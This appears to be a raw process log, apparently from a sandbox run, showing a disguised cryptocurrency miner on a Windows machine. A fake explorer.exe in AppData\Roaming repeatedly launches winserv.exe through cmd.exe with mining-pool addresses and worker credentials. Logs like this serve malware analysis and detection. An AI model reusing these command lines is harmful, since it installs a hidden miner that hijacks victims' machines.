cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
